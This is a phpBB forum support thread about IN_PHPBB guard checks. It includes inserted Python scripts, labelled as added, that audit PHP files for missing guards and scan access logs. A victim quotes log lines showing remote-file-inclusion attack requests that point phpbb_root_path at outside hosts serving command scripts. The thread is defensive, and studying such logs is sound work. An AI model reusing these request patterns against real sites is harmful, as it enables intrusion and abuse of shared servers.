| Author |
Message |
Blisk
phpBB2.de User

Joined: 27.11.2003
Posts: 994
Location: sLOVEnia
|
Posted:
Tue 30 May, 2006 15:03 |
  |
This is for all files in the /includes folder.
What about other files, like the /admin folder?
And all others? |
|
|
    |
 |
Speedy
phpBB2.de User


Joined: 07.09.2002
Posts: 283
Location: Mexico :)
|
Posted:
Mon 05 Jun, 2006 12:00 |
  |
Am I right that if I have Plus 1.52, I don't need to do the update?
Also, I can't find the file in the includes folder  |
_________________ ..:: Sat-Bay.de ::..
We have almost everything |
|
    |
 |
Titus
Administrator

Joined: 24.03.2004
Posts: 4255
|
Posted:
Mon 05 Jun, 2006 12:09 |
  |
If you didn't install the KB yourself, you don't need to do it |
_________________ "doesn't work" is not an error description anyone can work with
if you have questions, search first
Downloads are available here and there |
|
   |
 |
Alena
phpBB2.de User

Joined: 05.09.2005
Posts: 26
|
Posted:
Mon 27 Nov, 2006 16:44 |
  |
Is it normal? (file attach_rules.php)
| PHP: |
<?php /***************************************************************************/
if ( defined('IN_PHPBB') )
{
	die('Hacking attempt');
	exit;
}
define('IN_PHPBB', TRUE);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
|
As I understand, 'Hacking attempt' should appear only if " define('IN_PHPBB', TRUE) " is absent?
And: what do we use " exit; " for?
======================================
I'm also wondering about files: phpbb2/kb.php and phpbb2/kb_search.php |
Last edited by Alena on Mon 27 Nov, 2006 16:56; edited 2 times in total |
|
    |
 |
coolsoft
phpBB2.de User


Joined: 09.11.2005
Posts: 5498
Location: deep in the south (G)
|
Posted:
Mon 27 Nov, 2006 16:50 |
  |
|
    |
 |
cback
phpBB2.de User
 [KB] Manager

Joined: 16.01.2004
Posts: 3321
Location: Saarland
|
Posted:
Tue 28 Nov, 2006 09:49 |
  |
| Alena wrote: |
Is it normal? (file attach_rules.php)
| PHP: |
<?php /***************************************************************************/
if ( defined('IN_PHPBB') )
{
	die('Hacking attempt');
	exit;
}
define('IN_PHPBB', TRUE);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
|
As I understand, 'Hacking attempt' should appear only if " define('IN_PHPBB', TRUE) " is absent?
And: what do we use " exit; " for?
======================================
I'm also wondering about files: phpbb2/kb.php and phpbb2/kb_search.php |
It's normal in this file. It has to be executed "alone" and not inside another phpBB script. So the script checks if it's already defined; if not, the first step is again to define it. |
_________________ [ Forensoftware | CBACK Software | SYNTACTION ]
Support only in Forum! - Support nur im Forum! |
|
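An added example, not part of the original thread: the split described in the reply above (entry scripts define IN_PHPBB, include files must check it) can be audited across the whole tree, including /admin. The regular expressions, the three verdict labels and the sample files are assumptions made for this example.

```python
import re
import tempfile
from pathlib import Path

# Include files must check the constant: if ( !defined('IN_PHPBB') ) { die(...); }
GUARD = re.compile(r"if\s*\(\s*!\s*defined\s*\(\s*['\"]IN_PHPBB['\"]\s*\)\s*\)")
# Entry scripts set it themselves: define('IN_PHPBB', TRUE);
DEFINE = re.compile(r"\bdefine\s*\(\s*['\"]IN_PHPBB['\"]")
# Statements that must not be reachable before the guard has run.
RISKY = re.compile(r"\b(?:include|require)(?:_once)?\b|\bfunction\s+\w+\s*\(")
COMMENTS = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)

def classify(php_source):
    """Return 'entry', 'guarded' or 'UNGUARDED' for the text of one PHP file."""
    code = COMMENTS.sub("", php_source)  # skip licence headers and remarks
    if DEFINE.search(code):
        return "entry"  # defines IN_PHPBB itself: meant to be requested directly
    guard, risky = GUARD.search(code), RISKY.search(code)
    if guard and (risky is None or guard.start() < risky.start()):
        return "guarded"  # dies before any include or function definition
    return "UNGUARDED"  # an include file that can be requested on its own

def audit(root):
    """Classify every *.php file below root, keyed by path relative to root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): classify(p.read_text(errors="replace"))
            for p in root.rglob("*.php")}

def demo():
    """Run the audit over a constructed tree (file names and bodies are made up)."""
    guard = "if ( !defined('IN_PHPBB') )\n{\n\tdie(\"Hacking attempt\");\n}\n"
    files = {
        "attach_rules.php": "<?php\ndefine('IN_PHPBB', TRUE);\n$phpbb_root_path = './';\n",
        "includes/ok.php": "<?php\n/* header */\n" + guard + "include($phpbb_root_path . 'a.php');\n",
        "includes/late.php": "<?php\ninclude($phpbb_root_path . 'a.php');\n" + guard,
        "admin/none.php": "<?php\nfunction f() { global $phpbb_root_path; }\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in files.items():
            path = Path(tmp, name)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
        return audit(tmp)

if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{verdict:10} {name}")
```

Calling `audit()` on the forum's root directory lists every file reported as UNGUARDED; those are the ones still reachable by a direct request.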
     |
 |
Alena
phpBB2.de User

Joined: 05.09.2005
Posts: 26
|
Posted:
Tue 28 Nov, 2006 20:44 |
  |
My site was blocked by the hoster because it ate too many resources; the reason was this request:
| Quote: |
| my.site.acc_log:210.166.209.167 my.site - [26/Nov/2006:07:28:52 +0300] "GET /includes/functions_kb.php?phpbb_root_path=http://argento-bali.com/cmd.do?? HTTP/1.1" 200 5 "-" "libwww-perl/5.65" |
I read this subject and added
| PHP: |
<?php if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
|
at the beginning of the listed files
auth.php
kb_constants.php
emailer.php
functions.php
functions_admin.php
functions_bookmark.php
functions_jr_admin.php
functions_kb.php
functions_mods_settings.php
functions_module.php
functions_profile_fields.php
functions_search.php
functions_selects.php
functions_stats.php
functions_validate.php
sessions.php
smtp.php
sql_parse.php
template.php
topic_review.php
usercp_avatar.php
and also added
| Quote: |
php_flag register_globals off
php_flag allow_url_fopen off |
in the .htaccess file.
But today my hoster stopped the site again and the reason is:
| Quote: |
| 217.112.37.50 my.site - [28/Nov/2006:15:03:26 +0300] \"GET /includes/functions.php?phpbb_root_path=http://www.bcbud.us/site/images/cmd.txt? HTTP/1.1\" 200 27 \"-\" \"libwww-perl/5.79\" |
What else can I do?
Yes, and the beginning of the file functions.php:
| PHP: |
<?php
/***************************************************************************
* functions.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: functions.php,v 1.133.2.31 2003/07/20 13:14:27 acydburn Exp $
*
*
***************************************************************************/
/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
define('STYLE_URL', 's');
//-- mod : post icon -------------------------------------------------------------------------------
//-- add
function get_icon_title($icon, $empty=0, $topic_type=-1, $admin=false)
{
	global $lang, $images, $phpEx, $phpbb_root_path;
	// get icons parameters
	include($phpbb_root_path . './includes/def_icons.' . $phpEx);
	// admin path
	$admin_path = ($admin) ? '../' : './';
	// alignment
	switch ($empty)
	{
		case 1:
			$align= 'middle';
			break;
		case 2:
			$align= 'bottom';
			break;
		default:
			$align = 'absbottom';
			break;
	}
............................
|
|
|
|
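The two requests quoted in the post above share one signature: a file under /includes requested directly, with phpbb_root_path set to a URL. As an added example (not part of the original post), this scans access-log lines for that pattern; the sample lines, addresses and host names are constructed, and the field layout is assumed to match the first log line quoted above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Client, request target, status and size from lines shaped like the ones
# quoted in the post; any fields between the client IP and "[" are skipped.
LINE = re.compile(r'^(?P<ip>\S+) .*?\[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" '
                  r'(?P<status>\d{3}) (?P<size>\d+|-)')
# A parameter value that is itself a URL is what a remote include needs.
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)

# Constructed sample lines (documentation addresses, placeholder host names).
SAMPLE = [
    '203.0.113.7 forum.example - [26/Nov/2006:07:28:52 +0300] "GET /includes/functions_kb.php'
    '?phpbb_root_path=http://files.example.invalid/cmd.txt?? HTTP/1.1" 200 5 "-" "libwww-perl/5.65"',
    '198.51.100.9 forum.example - [28/Nov/2006:15:03:26 +0300] "GET /includes/functions.php'
    '?phpbb_root_path=http%3A%2F%2Ffiles.example.invalid%2Fcmd.txt%3F HTTP/1.1" 200 27 "-" "libwww-perl/5.79"',
    '198.51.100.20 forum.example - [28/Nov/2006:15:04:00 +0300] '
    '"GET /viewtopic.php?t=42&highlight=http HTTP/1.1" 200 18231 "-" "Mozilla/5.0"',
    '198.51.100.20 forum.example - [28/Nov/2006:15:04:02 +0300] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

def rfi_probes(lines):
    """Return one record per request whose query string carries a URL value."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line this pattern understands
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE.match(value):
                size = 0 if m["size"] == "-" else int(m["size"])
                hits.append({"ip": m["ip"], "script": parts.path, "param": name,
                             "value": value, "status": int(m["status"]), "size": size})
                break
    return hits

def probed_scripts(lines):
    """Scripts that were requested directly with a URL-valued parameter."""
    return sorted({h["script"] for h in rfi_probes(lines)})

if __name__ == "__main__":
    for h in rfi_probes(SAMPLE):
        print(h["ip"], h["status"], h["size"], h["script"], h["param"], "=", h["value"])
```

Running `probed_scripts` over the real log gives the list of files to check for the guard first.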
    |
 |
coolsoft
phpBB2.de User


Joined: 09.11.2005
Posts: 5498
Location: deep in the south (G)
|
Posted:
Tue 28 Nov, 2006 20:54 |
  |
|
    |
 |
Alena
phpBB2.de User

Joined: 05.09.2005
Posts: 26
|
Posted:
Tue 28 Nov, 2006 21:06 |
  |
Do you think it is the fault of the hoster? I don't know…
Maybe: a hoster with special characteristics (what characteristics do I need?)?
Anyway: it helps only until the moment when some bad guy uses this hole in security.  |
|
|
    |
 |
KoraS
phpBB2.de User


Joined: 06.11.2006
Posts: 19
|
Posted:
Sat 29 Sep, 2007 19:56 |
  |
| Alena wrote: |
My site was blocked by the hoster because it ate too many resources; the reason was this request:
| error message wrote: |
| my.site.acc_log:210.166.209.167 my.site - [26/Nov/2006:07:28:52 +0300] "GET /includes/functions_kb.php?phpbb_root_path=http://argento-bali.com/cmd.do?? HTTP/1.1" 200 5 "-" "libwww-perl/5.65" |
.... |
I had the same problem, added the code as above, but am now a bit reluctant to reopen my forum; the message my hoster sent me was the following:
| my hoster wrote: |
Hackers keep getting into your account and are running scripts that use all the server's CPU.
This generates complaints from other users on your shared server.
You have two forums and neither are "disabled" as far as a hacker being able to get it.
..... |
Best would be if there is a hacker who could check the forums out, and then we as owners would be able to add something like a hacker secure image or similar...
Check this out, looks interesting, will have a closer look when I have more time:
http://phpsec.org/ |
|
|
   |
 |
|
|
|
|